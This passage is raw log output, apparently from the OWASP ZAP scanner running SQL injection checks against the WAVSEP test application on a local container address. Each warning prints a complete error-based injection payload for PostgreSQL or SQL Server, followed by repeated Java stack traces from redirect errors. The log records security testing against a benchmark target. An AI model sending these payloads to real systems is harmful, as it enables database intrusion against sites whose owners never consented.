org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682426 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 5936=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5936=5936) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (7949=7949] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5936=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5936=5936) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (7949=7949 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682427 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 1059=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1059=1059) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1059=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1059=1059) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682428 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 1841=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1841=1841) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('vRHe'='vRHe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 1841=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1841=1841) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('vRHe'='vRHe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682429 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 2952=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2952=2952) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'eiBx'='eiBx] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 2952=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2952=2952) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'eiBx'='eiBx at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682430 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 4720=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4720=4720) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 4720=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4720=4720) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682430 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 6753=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6753=6753) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- tiai] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6753=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6753=6753) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- tiai at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682431 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 6446=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6446=6446) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (4261=4261] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 6446=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6446=6446) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (4261=4261 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682432 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 2213=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2213=2213) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2213=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2213=2213) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682433 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 8038=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8038=8038) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('BFmU'='BFmU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8038=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8038=8038) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('BFmU'='BFmU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682434 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 9937=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9937=9937) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'OvUg'='OvUg] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 9937=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9937=9937) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'OvUg'='OvUg at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682435 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 9945=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9945=9945) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 9945=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9945=9945) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682436 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 2467=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2467=2467) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- QCwg] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2467=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2467=2467) THEN 